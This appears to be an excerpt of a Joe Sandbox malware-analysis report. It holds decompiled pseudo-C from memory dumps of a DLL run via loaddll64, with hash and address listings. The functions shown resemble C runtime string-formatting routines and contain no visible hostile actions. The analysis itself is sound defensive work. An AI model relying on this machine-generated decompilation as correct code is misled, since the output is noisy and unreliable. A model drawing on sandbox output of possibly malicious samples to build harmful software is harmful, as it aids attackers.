                                                                      				if (E0000000118002FED8(0, _t169, __rcx, __rcx, _t272, _t274) != 0) goto 0x8002ca23;
                                                                      				goto 0x8002cca2;
                                                                      				if ( *((char*)(__rcx + 0x38)) != 0) goto 0x8002cc9f;
                                                                      				_t148 =  *(__rcx + 0x28);
                                                                      				_v72 = 0;
                                                                      				_v70 = 0;
                                                                      				if ((r13b & 0) == 0) goto 0x8002ca70;
                                                                      				if ((r13b & 0) == 0) goto 0x8002ca55;
                                                                      				_v72 = 0x2d;
                                                                      				goto 0x8002ca6d;
                                                                      				if ((r13b & _t148) == 0) goto 0x8002ca60;
                                                                      				_v72 = 0x2b;
                                                                      				goto 0x8002ca6d;
                                                                      				if ((r13b & 0) == 0) goto 0x8002ca70;
                                                                      				_v72 = 0x20;
                                                                      				_t261 = _t287;
                                                                      				r8b =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				if ((r8b - sil & 0x000000df) != 0) goto 0x8002ca8d;
                                                                      				if ((r13b & _t148 >> 0x00000005) == 0) goto 0x8002ca8d;
                                                                      				r9b = r13b;
                                                                      				goto 0x8002ca90;
                                                                      				r9b = 0;
                                                                      				if (r9b != 0) goto 0x8002caa4;
                                                                      				if ((r8b - r14b & 0xffffff00 | (r8b - r14b & 0x000000df) == 0x00000000) == 0) goto 0x8002cabf;
                                                                      				 *((char*)(_t274 + _t261 - 0x20)) = 0x30;
                                                                      				if (r8b == sil) goto 0x8002cab3;
                                                                      				if (r8b != r14b) goto 0x8002cab6;
                                                                      				dil = sil;
                                                                      				 *((intOrPtr*)(_t274 + _t261 - 0x1f)) = dil;
                                                                      				_t172 =  *((intOrPtr*)(__rcx + 0x2c)) -  *((intOrPtr*)(__rcx + 0x48));
                                                                      				if ((_t148 & 0x0000000c) != 0) goto 0x8002cb2b;
                                                                      				r9d = 0;
                                                                      				if (_t172 <= 0) goto 0x8002cb2b;
                                                                      				_t279 =  *((intOrPtr*)(__rcx + 0x460));
                                                                      				if ( *((intOrPtr*)(_t279 + 0x10)) !=  *((intOrPtr*)(_t279 + 8))) goto 0x8002cafa;
                                                                      				if ( *((char*)(_t279 + 0x18)) == 0) goto 0x8002caf2;
                                                                      				goto 0x8002caf5;
                                                                      				 *(__rcx + 0x20) =  *(__rcx + 0x20) + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8002cb1e;
                                                                      				 *(__rcx + 0x20) = __rcx + 1;
                                                                      				 *((intOrPtr*)(_t279 + 0x10)) =  *((intOrPtr*)(_t279 + 0x10)) + _t287;
                                                                      				 *((char*)( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))))) = 0x20;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) =  *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x460)))) + _t287;
                                                                      				if ( *(__rcx + 0x20) == 0xffffffff) goto 0x8002cb2b;
                                                                      				r9d = r9d + r13d;
                                                                      				if (r9d - _t172 < 0) goto 0x8002cad6;
                                                                      				_t60 = _t247 + 0x20; // 0x98
                                                                      				_t270 = _t60;
                                                                      				r8d = 0;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t62 = _t247 + 0x460; // 0x4d8
                                                                      				_t288 = _t62;
                                                                      				_t252 = _t288;
                                                                      				E000000011800360A4(__rcx + 1, _t169, _t172, __rcx, _t252, _t270, _t272, _t274, _t270);
                                                                      				_t153 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t153 >> 0x00000003) == 0) goto 0x8002cbb4;
                                                                      				if ((r13b & _t153 >> 0x00000002) != 0) goto 0x8002cbb4;
                                                                      				r8d = 0;
                                                                      				if (_t172 <= 0) goto 0x8002cbb4;
                                                                      				_t264 =  *_t288;
                                                                      				if ( *((intOrPtr*)(_t264 + 0x10)) !=  *((intOrPtr*)(_t264 + 8))) goto 0x8002cb8d;
                                                                      				if ( *((char*)(_t264 + 0x18)) == 0) goto 0x8002cb86;
                                                                      				goto 0x8002cb89;
                                                                      				 *_t270 =  *_t270 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8002cba7;
                                                                      				 *_t270 = _t252 + 1;
                                                                      				 *((intOrPtr*)(_t264 + 0x10)) =  *((intOrPtr*)(_t264 + 0x10)) + _t287;
                                                                      				 *((char*)( *((intOrPtr*)( *_t288)))) = 0x30;
                                                                      				 *((intOrPtr*)( *_t288)) =  *((intOrPtr*)( *_t288)) + _t287;
                                                                      				if ( *_t270 == 0xffffffff) goto 0x8002cbb4;
                                                                      				r8d = r8d + r13d;
                                                                      				if (r8d - _t172 < 0) goto 0x8002cb6f;
                                                                      				if ( *((char*)(__rcx + 0x4c)) == 0) goto 0x8002cc26;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x48)) <= 0) goto 0x8002cc26;
                                                                      				r14d = 0;
                                                                      				_t79 =  &_v68; // -27
                                                                      				r9d =  *( *(__rcx + 0x40)) & 0x0000ffff;
                                                                      				_t80 =  &_v72; // -31
                                                                      				_v72 = _v72 & 0x00000000;
                                                                      				r8d = 6;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				if (E00000001180040970( *((intOrPtr*)(__rcx + 8)), __rcx, _t80, _t79, _t274, _t279) != 0) goto 0x8002cc21;
                                                                      				r8d = _v72;
                                                                      				if (r8d == 0) goto 0x8002cc21;
                                                                      				_v88 =  *((intOrPtr*)(_t247 + 8));
                                                                      				_t140 = E000000011800360A4(_t139, _t169, _t172, _t247, _t288, _t270, _t272, _t274, _t270);
                                                                      				r14d = r14d + r13d;
                                                                      				if (r14d !=  *(_t247 + 0x48)) goto 0x8002cbc7;
                                                                      				goto 0x8002cc42;
                                                                      				 *_t270 =  *_t270 | 0xffffffff;
                                                                      				goto 0x8002cc42;
                                                                      				r8d =  *(_t247 + 0x48);
                                                                      				_t256 = _t288;
                                                                      				_v88 =  *((intOrPtr*)(_t247 + 8));
                                                                      				E000000011800360A4(_t140, _t169, _t172, _t247, _t256, _t270, _t272, _t274, _t270);
                                                                      				_t159 =  *_t270;
                                                                      				if (_t159 < 0) goto 0x8002cc9f;
                                                                      				if ((r13b &  *(_t247 + 0x28) >> 0x00000002) == 0) goto 0x8002cc9f;
                                                                      				r8d = 0;
                                                                      				if (_t172 <= 0) goto 0x8002cc9f;
                                                                      				_t268 =  *_t288;
                                                                      				if ( *((intOrPtr*)(_t268 + 0x10)) !=  *((intOrPtr*)(_t268 + 8))) goto 0x8002cc78;
                                                                      				if ( *((char*)(_t268 + 0x18)) == 0) goto 0x8002cc71;
                                                                      				goto 0x8002cc74;
                                                                      				 *_t270 = _t159 + 0x00000001 | 0xffffffff;
                                                                      				goto 0x8002cc92;
                                                                      				 *_t270 = _t256 + 1;
                                                                      				 *((intOrPtr*)(_t268 + 0x10)) =  *((intOrPtr*)(_t268 + 0x10)) + _t287;
                                                                      				 *((char*)( *((intOrPtr*)( *_t288)))) = 0x20;
                                                                      				 *((intOrPtr*)( *_t288)) =  *((intOrPtr*)( *_t288)) + _t287;
                                                                      				if ( *_t270 == 0xffffffff) goto 0x8002cc9f;
                                                                      				r8d = r8d + r13d;
                                                                      				if (r8d - _t172 < 0) goto 0x8002cc5a;
                                                                      				return E000000011800028F0(r13b,  *_t270, _v56 ^ _t275 - 0x00000050);
                                                                      			}



































                                                                      0x18002c900
                                                                      0x18002c900
                                                                      0x18002c900
                                                                      0x18002c900
                                                                      0x18002c900
                                                                      0x18002c905
                                                                      0x18002c90a
                                                                      0x18002c918
                                                                      0x18002c91f
                                                                      0x18002c929
                                                                      0x18002c92d
                                                                      0x18002c930
                                                                      0x18002c933
                                                                      0x18002c939
                                                                      0x18002c93c
                                                                      0x18002c93f
                                                                      0x18002c942
                                                                      0x18002c944
                                                                      0x18002c946
                                                                      0x18002c94f
                                                                      0x18002c957
                                                                      0x18002c95b
                                                                      0x18002c963
                                                                      0x18002c96b
                                                                      0x18002c970
                                                                      0x18002c974
                                                                      0x18002c978
                                                                      0x18002c980
                                                                      0x18002c988
                                                                      0x18002c98d
                                                                      0x18002c992
                                                                      0x18002c997
                                                                      0x18002c99c
                                                                      0x18002c9a1
                                                                      0x18002c9a5
                                                                      0x18002c9a9
                                                                      0x18002c9ad
                                                                      0x18002c9b1
                                                                      0x18002c9b5
                                                                      0x18002c9b9
                                                                      0x18002c9bd
                                                                      0x18002c9c2
                                                                      0x18002c9c6
                                                                      0x18002c9c8
                                                                      0x18002c9cd
                                                                      0x18002c9cf
                                                                      0x18002c9d6
                                                                      0x18002c9dd
                                                                      0x18002c9df
                                                                      0x18002c9ea
                                                                      0x18002c9ec
                                                                      0x18002c9f0
                                                                      0x18002c9f8
                                                                      0x18002c9fd
                                                                      0x18002c9ff
                                                                      0x18002ca04
                                                                      0x18002ca06
                                                                      0x18002ca0c
                                                                      0x18002ca11
                                                                      0x18002ca1a
                                                                      0x18002ca1e
                                                                      0x18002ca27
                                                                      0x18002ca2d
                                                                      0x18002ca32
                                                                      0x18002ca38
                                                                      0x18002ca43
                                                                      0x18002ca4d
                                                                      0x18002ca4f
                                                                      0x18002ca53
                                                                      0x18002ca58
                                                                      0x18002ca5a
                                                                      0x18002ca5e
                                                                      0x18002ca67
                                                                      0x18002ca69
                                                                      0x18002ca6d
                                                                      0x18002ca70
                                                                      0x18002ca7c
                                                                      0x18002ca86
                                                                      0x18002ca88
                                                                      0x18002ca8b
                                                                      0x18002ca8d
                                                                      0x18002ca9e
                                                                      0x18002caa2
                                                                      0x18002caa4
                                                                      0x18002caac
                                                                      0x18002cab1
                                                                      0x18002cab3
                                                                      0x18002cab6
                                                                      0x18002cac4
                                                                      0x18002caca
                                                                      0x18002cacc
                                                                      0x18002cad1
                                                                      0x18002cad6
                                                                      0x18002cae5
                                                                      0x18002caec
                                                                      0x18002caf0
                                                                      0x18002caf5
                                                                      0x18002caf8
                                                                      0x18002cafd
                                                                      0x18002cb00
                                                                      0x18002cb0e
                                                                      0x18002cb18
                                                                      0x18002cb21
                                                                      0x18002cb23
                                                                      0x18002cb29
                                                                      0x18002cb2f
                                                                      0x18002cb2f
                                                                      0x18002cb33
                                                                      0x18002cb36
                                                                      0x18002cb3b
                                                                      0x18002cb3b
                                                                      0x18002cb45
                                                                      0x18002cb4c
                                                                      0x18002cb51
                                                                      0x18002cb5c
                                                                      0x18002cb64
                                                                      0x18002cb66
                                                                      0x18002cb6b
                                                                      0x18002cb6f
                                                                      0x18002cb7a
                                                                      0x18002cb80
                                                                      0x18002cb84
                                                                      0x18002cb89
                                                                      0x18002cb8b
                                                                      0x18002cb90
                                                                      0x18002cb92
                                                                      0x18002cb9c
                                                                      0x18002cba2
                                                                      0x18002cbaa
                                                                      0x18002cbac
                                                                      0x18002cbb2
                                                                      0x18002cbb8
                                                                      0x18002cbbe
                                                                      0x18002cbc4
                                                                      0x18002cbcb
                                                                      0x18002cbcf
                                                                      0x18002cbd4
                                                                      0x18002cbd8
                                                                      0x18002cbe1
                                                                      0x18002cbe7
                                                                      0x18002cbf3
                                                                      0x18002cbf5
                                                                      0x18002cbfc
                                                                      0x18002cc09
                                                                      0x18002cc11
                                                                      0x18002cc16
                                                                      0x18002cc1d
                                                                      0x18002cc1f
                                                                      0x18002cc21
                                                                      0x18002cc24
                                                                      0x18002cc2d
                                                                      0x18002cc31
                                                                      0x18002cc38
                                                                      0x18002cc3d
                                                                      0x18002cc42
                                                                      0x18002cc46
                                                                      0x18002cc51
                                                                      0x18002cc53
                                                                      0x18002cc58
                                                                      0x18002cc5a
                                                                      0x18002cc65
                                                                      0x18002cc6b
                                                                      0x18002cc6f
                                                                      0x18002cc74
                                                                      0x18002cc76
                                                                      0x18002cc7b
                                                                      0x18002cc7d
                                                                      0x18002cc87
                                                                      0x18002cc8d
                                                                      0x18002cc95
                                                                      0x18002cc97
                                                                      0x18002cc9d
                                                                      0x18002cccb

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80cba162663282b24e2422ae0098691d2927aef6c283a6cd7ade8e37cbb693f5
                                                                      • Instruction ID: 55a3743547ffe318b0961c9a4525c37079d4abb0de2bd261f6771f51dbb1a311
                                                                      • Opcode Fuzzy Hash: 80cba162663282b24e2422ae0098691d2927aef6c283a6cd7ade8e37cbb693f5
                                                                      • Instruction Fuzzy Hash: ACD19E7660064C86EBABCB298000BED27A1E74DBCCF248206EE49176D5DF35CA4AD743
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 44d576fb52b53df2752ec68c421180a711337e154daff74e2d6c601616dbebde
                                                                      • Instruction ID: 124dae1d189724f4214901013c0eea625b459e037cc8b5610fc7900c629b7070
                                                                      • Opcode Fuzzy Hash: 44d576fb52b53df2752ec68c421180a711337e154daff74e2d6c601616dbebde
                                                                      • Instruction Fuzzy Hash: C4E11270D007488FEB68CFE8D59A9DDBBB0FF44304F14462ED856AA294D7B4994ACF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 67%
                                                                      			E0000000118004B7E8(void* __ecx, signed int __edx, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __rbp, void* __r9, void* __r10, long long _a16, long long _a24) {
                                                                      				void* _v24;
                                                                      				signed int _v40;
                                                                      				char _v168;
                                                                      				void* __rsi;
                                                                      				void* _t70;
                                                                      				unsigned int _t83;
                                                                      				unsigned int _t86;
                                                                      				signed char _t97;
                                                                      				signed int _t99;
                                                                      				void* _t110;
                                                                      				signed long long _t145;
                                                                      				signed long long _t146;
                                                                      				long long _t150;
                                                                      				void* _t178;
                                                                      				signed long long _t180;
                                                                      				signed long long _t181;
                                                                      				signed long long _t182;
                                                                      				signed long long _t183;
                                                                      				void* _t185;
                                                                      				void* _t188;
                                                                      				signed short* _t205;
                                                                      				void* _t207;
                                                                      				void* _t209;
                                                                      
                                                                      				_t207 = __r10;
                                                                      				_t186 = __rbp;
                                                                      				_t110 = __eflags;
                                                                      				_t99 = __edx;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_t145 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_t146 = _t145 ^ _t188 - 0x000000c0;
                                                                      				_v40 = _t146;
                                                                      				_t185 = __rcx;
                                                                      				E0000000118003CFF0(_t146, __rbx, __rdx, __rcx);
                                                                      				r9d = 0x40;
                                                                      				_t5 = _t146 + 0x98; // 0x98
                                                                      				_t150 = _t5;
                                                                      				asm("sbb edx, edx");
                                                                      				if (E000000011800475F0((_t99 & 0xfffff005) + 0x1002, _t110, _t146, _t150, _t185, _t185, __rbp,  &_v168) != 0) goto 0x8004b857;
                                                                      				 *(_t150 + 0x10) = 0;
                                                                      				goto 0x8004ba95;
                                                                      				_t70 = E00000001180014B1C(_t146,  *((intOrPtr*)(_t150 + 8)));
                                                                      				_t181 = _t180 | 0xffffffff;
                                                                      				r13d = _t181 + 0x56;
                                                                      				if (_t70 != 0) goto 0x8004b91e;
                                                                      				r9d = _t181 + 0x41;
                                                                      				asm("sbb edx, edx");
                                                                      				if (E000000011800475F0(((_t99 & 0xfffff005) + 0x00001002 & 0xfffff002) + 0x1001, _t70, _t146, _t150, _t185, _t185, _t186,  &_v168) == 0) goto 0x8004b84a;
                                                                      				if (E00000001180014B1C(_t146,  *_t150) != 0) goto 0x8004b8c9;
                                                                      				_t97 =  *(_t150 + 0x10) | 0x00000304;
                                                                      				 *(_t150 + 0x10) = _t97;
                                                                      				if ( *((intOrPtr*)(_t185 + (_t181 + 1) * 2)) != 0) goto 0x8004b8bd;
                                                                      				goto 0x8004b901;
                                                                      				if ((_t97 & 0x00000002) != 0) goto 0x8004b91e;
                                                                      				if ( *((intOrPtr*)(_t150 + 0x14)) == 0) goto 0x8004b9a7;
                                                                      				if (E000000011800552C8(_t146,  *_t150) != 0) goto 0x8004b9a7;
                                                                      				 *(_t150 + 0x10) =  *(_t150 + 0x10) | 0x00000002;
                                                                      				if ( *((intOrPtr*)(_t185 + (_t181 + 1) * 2)) != 0) goto 0x8004b8f7;
                                                                      				_t28 = _t150 + 0x258; // 0x2f0
                                                                      				if (E0000000118004B224(_t146, _t150, _t28, _t209, _t185, _t185, _t181 + 2) != 0) goto 0x8004babd;
                                                                      				if (( *(_t150 + 0x10) & 0x00000300) == 0x300) goto 0x8004ba8a;
                                                                      				r9d = 0x40;
                                                                      				asm("sbb edx, edx");
                                                                      				if (E000000011800475F0((((_t99 & 0xfffff005) + 0x00001002 & 0xfffff002) + 0x00001001 & 0xfffff002) + 0x1001, ( *(_t150 + 0x10) & 0x00000300) - 0x300, _t146, _t150, _t185, _t185, _t186,  &_v168) == 0) goto 0x8004b84a;
                                                                      				if (E00000001180014B1C(_t146,  *_t150) != 0) goto 0x8004ba8a;
                                                                      				_t83 =  *(_t150 + 0x10);
                                                                      				asm("bts eax, 0x9");
                                                                      				 *(_t150 + 0x10) = _t83;
                                                                      				if ( *((intOrPtr*)(_t150 + 0x18)) == 0) goto 0x8004b9d7;
                                                                      				asm("bts eax, 0x8");
                                                                      				_t36 = _t150 + 0x258; // 0x2f0
                                                                      				 *(_t150 + 0x10) = _t83;
                                                                      				if ( *_t36 != 0) goto 0x8004ba8a;
                                                                      				_t182 = _t181 + 1;
                                                                      				if ( *((intOrPtr*)(_t185 + _t182 * 2)) != 0) goto 0x8004b999;
                                                                      				goto 0x8004ba77;
                                                                      				if (( *(_t150 + 0x10) & 0x00000001) != 0) goto 0x8004b91e;
                                                                      				if (E0000000118004BC8C(0x300,  *(_t150 + 0x10) & 0x00000001, _t185,  &_v168, _t185, _t186, _t181 + 2, _t207) == 0) goto 0x8004b91e;
                                                                      				 *(_t150 + 0x10) =  *(_t150 + 0x10) | 0x00000001;
                                                                      				if ( *((intOrPtr*)(_t185 + (_t182 + 1) * 2)) != 0) goto 0x8004b9c8;
                                                                      				goto 0x8004b901;
                                                                      				if ( *((intOrPtr*)(_t150 + 0x14)) == 0) goto 0x8004ba5b;
                                                                      				_t178 =  *_t150;
                                                                      				if ( *((intOrPtr*)(_t178 + (_t182 + 1) * 2)) != 0) goto 0x8004b9e2;
                                                                      				if (0x300 !=  *((intOrPtr*)(_t150 + 0x14))) goto 0x8004ba5b;
                                                                      				if (E0000000118004BC8C(0x300, 0x300 -  *((intOrPtr*)(_t150 + 0x14)), _t185, _t178, _t185, _t186, _t182 + 1, _t207) != 0) goto 0x8004ba3f;
                                                                      				_t205 =  *_t150;
                                                                      				r8d = 0;
                                                                      				if (_t205 == 0) goto 0x8004ba2d;
                                                                      				_t86 = _t178 - 0x41;
                                                                      				if (_t86 - 0x19 <= 0) goto 0x8004ba25;
                                                                      				if (( *_t205 & 0x0000ffff) - 0x61 - 0x19 > 0) goto 0x8004ba2d;
                                                                      				r8d = r8d + 1;
                                                                      				goto 0x8004ba0e;
                                                                      				if (_t205[_t182 + 1] != 0) goto 0x8004ba30;
                                                                      				if (r8d == _t86) goto 0x8004ba8a;
                                                                      				asm("bts dword [ebx+0x10], 0x8");
                                                                      				_t54 = _t150 + 0x258; // 0x2f0
                                                                      				if ( *_t54 != 0) goto 0x8004ba8a;
                                                                      				_t183 = _t182 + 1;
                                                                      				if ( *((intOrPtr*)(_t185 + _t183 * 2)) != 0) goto 0x8004ba50;
                                                                      				goto 0x8004ba77;
                                                                      				asm("bts eax, 0x8");
                                                                      				_t57 = _t150 + 0x258; // 0x2f0
                                                                      				 *(_t150 + 0x10) = _t86;
                                                                      				if ( *_t57 != 0) goto 0x8004ba8a;
                                                                      				if ( *((intOrPtr*)(_t185 + (_t183 + 1) * 2)) != 0) goto 0x8004ba6e;
                                                                      				if (E0000000118004B224(_t182 + 1, _t150, _t57, _t209, _t185, _t185, _t183 + 2) != 0) goto 0x8004babd;
                                                                      				return E000000011800028F0( !( *(_t150 + 0x10) >> 2) & 0x00000001, 0x300, _v40 ^ _t188 - 0x000000c0);
                                                                      			}


























                                                                      0x18004b7e8
                                                                      0x18004b7e8
                                                                      0x18004b7e8
                                                                      0x18004b7e8
                                                                      0x18004b7e8
                                                                      0x18004b7ed
                                                                      0x18004b7fd
                                                                      0x18004b804
                                                                      0x18004b807
                                                                      0x18004b80f
                                                                      0x18004b812
                                                                      0x18004b817
                                                                      0x18004b822
                                                                      0x18004b822
                                                                      0x18004b831
                                                                      0x18004b848
                                                                      0x18004b84a
                                                                      0x18004b852
                                                                      0x18004b860
                                                                      0x18004b865
                                                                      0x18004b869
                                                                      0x18004b86f
                                                                      0x18004b878
                                                                      0x18004b886
                                                                      0x18004b89b
                                                                      0x18004b8af
                                                                      0x18004b8b1
                                                                      0x18004b8ba
                                                                      0x18004b8c5
                                                                      0x18004b8c7
                                                                      0x18004b8cc
                                                                      0x18004b8d1
                                                                      0x18004b8ea
                                                                      0x18004b8f0
                                                                      0x18004b8ff
                                                                      0x18004b901
                                                                      0x18004b918
                                                                      0x18004b92a
                                                                      0x18004b93a
                                                                      0x18004b943
                                                                      0x18004b958
                                                                      0x18004b96d
                                                                      0x18004b973
                                                                      0x18004b976
                                                                      0x18004b97a
                                                                      0x18004b980
                                                                      0x18004b982
                                                                      0x18004b986
                                                                      0x18004b98d
                                                                      0x18004b993
                                                                      0x18004b999
                                                                      0x18004b9a0
                                                                      0x18004b9a2
                                                                      0x18004b9ab
                                                                      0x18004b9bb
                                                                      0x18004b9c1
                                                                      0x18004b9d0
                                                                      0x18004b9d2
                                                                      0x18004b9da
                                                                      0x18004b9dc
                                                                      0x18004b9e9
                                                                      0x18004b9ee
                                                                      0x18004b9fa
                                                                      0x18004b9fc
                                                                      0x18004b9ff
                                                                      0x18004ba08
                                                                      0x18004ba12
                                                                      0x18004ba19
                                                                      0x18004ba23
                                                                      0x18004ba28
                                                                      0x18004ba2b
                                                                      0x18004ba38
                                                                      0x18004ba3d
                                                                      0x18004ba3f
                                                                      0x18004ba44
                                                                      0x18004ba4e
                                                                      0x18004ba50
                                                                      0x18004ba57
                                                                      0x18004ba59
                                                                      0x18004ba5b
                                                                      0x18004ba5f
                                                                      0x18004ba66
                                                                      0x18004ba6c
                                                                      0x18004ba75
                                                                      0x18004ba88
                                                                      0x18004babc

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue$CurrentFeatureInfoLocalePresentProcessProcessor
                                                                      • String ID:
                                                                      • API String ID: 2071376764-0
                                                                      • Opcode ID: 93375e08857551a8048b62e3e968634333639659819d9424dbc43d56e3b27cf9
                                                                      • Instruction ID: 91469f8dfd53a35fca17540bb23592ff26d627765f33a79ab1821807b5f69cdb
                                                                      • Opcode Fuzzy Hash: 93375e08857551a8048b62e3e968634333639659819d9424dbc43d56e3b27cf9
                                                                      • Instruction Fuzzy Hash: 4CB1E272614A4C82EBA69F21D4917EA33A0E788BCCF01C225FB55C76C9DF38C65AC744
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 60%
                                                                      			E00000001180026288(signed int __esi, long long __rbx, void* __rcx, void* __rdx, signed int __rbp, void* __r8, void* __r10, long long _a16, long long _a24) {
                                                                      				long long _v32;
                                                                      				long long _v40;
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				signed int _t115;
                                                                      				void* _t120;
                                                                      				signed int _t123;
                                                                      				signed int _t136;
                                                                      				signed int _t138;
                                                                      				void* _t141;
                                                                      				signed int _t143;
                                                                      				signed int _t152;
                                                                      				void* _t165;
                                                                      				intOrPtr _t175;
                                                                      				intOrPtr* _t177;
                                                                      				intOrPtr* _t188;
                                                                      				intOrPtr* _t193;
                                                                      				void* _t196;
                                                                      				void* _t198;
                                                                      				intOrPtr _t206;
                                                                      				intOrPtr _t208;
                                                                      				void* _t214;
                                                                      				void* _t216;
                                                                      				signed int _t217;
                                                                      				void* _t222;
                                                                      				void* _t223;
                                                                      
                                                                      				_t223 = __r10;
                                                                      				_t222 = __r8;
                                                                      				_t217 = __rbp;
                                                                      				_t210 = __rdx;
                                                                      				_t198 = __rcx;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_t175 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t143 = __esi | 0xffffffff;
                                                                      				_t196 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x460)) != __rbp) goto 0x800262bf;
                                                                      				 *((char*)(_t175 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t175 + 0x2c)) = 0x16;
                                                                      				goto 0x800265fb;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x10)) != __rbp) goto 0x800262f5;
                                                                      				 *((char*)(_t175 + 0x30)) = 1;
                                                                      				r9d = 0;
                                                                      				 *((intOrPtr*)(_t175 + 0x2c)) = 0x16;
                                                                      				r8d = 0;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = __rbp;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx, _t216, __rbp, __r8);
                                                                      				goto 0x800265a9;
                                                                      				 *((intOrPtr*)(_t198 + 0x468)) =  *((intOrPtr*)(_t198 + 0x468)) + 1;
                                                                      				if ( *((intOrPtr*)(_t198 + 0x468)) == 2) goto 0x800265a6;
                                                                      				_t177 =  *((intOrPtr*)(_t196 + 0x10));
                                                                      				 *((intOrPtr*)(_t196 + 0x48)) = 0;
                                                                      				 *(_t196 + 0x24) = bpl;
                                                                      				r8b =  *_t177;
                                                                      				 *((long long*)(_t196 + 0x10)) = _t177 + 1;
                                                                      				 *((intOrPtr*)(_t196 + 0x39)) = r8b;
                                                                      				if (r8b == 0) goto 0x80026593;
                                                                      				r9b = r8b;
                                                                      				if ( *(_t196 + 0x20) < 0) goto 0x80026588;
                                                                      				_t22 = _t222 - 0x20; // -16
                                                                      				if (_t22 - 0x5a > 0) goto 0x80026357;
                                                                      				goto 0x8002635a;
                                                                      				_t115 =  *(0x8005fce0 + (r8b - 0x20 + (r8b - 0x20) * 8 + r8b - 0x20) * 2) & 0x000000ff;
                                                                      				 *(_t196 + 0x24) = _t115;
                                                                      				if (_t115 - 8 >= 0) goto 0x800265e8;
                                                                      				_t152 = _t115;
                                                                      				if (_t152 == 0) goto 0x80026497;
                                                                      				if (_t152 == 0) goto 0x80026480;
                                                                      				if (_t152 == 0) goto 0x80026431;
                                                                      				if (_t152 == 0) goto 0x800263fa;
                                                                      				if (_t152 == 0) goto 0x800263f2;
                                                                      				if (_t152 == 0) goto 0x800263c8;
                                                                      				if (_t152 == 0) goto 0x800263be;
                                                                      				if (_t115 - 0xfffffffffffffffc != 1) goto 0x80026614;
                                                                      				E0000000118002C150(_t141, _t196, _t196, _t210, _t214, _t216, _t222, _t223);
                                                                      				goto 0x80026424;
                                                                      				E0000000118002A608(_t196, _t210);
                                                                      				goto 0x80026424;
                                                                      				if (r8b == 0x2a) goto 0x800263dc;
                                                                      				E00000001180025230(_t196, _t196, _t196 + 0x30, _t216);
                                                                      				goto 0x80026424;
                                                                      				 *((long long*)(_t196 + 0x18)) =  *((long long*)(_t196 + 0x18)) + 8;
                                                                      				_t136 =  *( *((intOrPtr*)(_t196 + 0x18)) - 8);
                                                                      				_t137 =  <  ? _t143 : _t136;
                                                                      				 *(_t196 + 0x30) =  <  ? _t143 : _t136;
                                                                      				goto 0x80026422;
                                                                      				 *(_t196 + 0x30) = 0;
                                                                      				goto 0x8002656a;
                                                                      				if (r8b == 0x2a) goto 0x80026406;
                                                                      				goto 0x800263d2;
                                                                      				 *((long long*)(_t196 + 0x18)) =  *((long long*)(_t196 + 0x18)) + 8;
                                                                      				_t138 =  *( *((intOrPtr*)(_t196 + 0x18)) - 8);
                                                                      				 *(_t196 + 0x2c) = _t138;
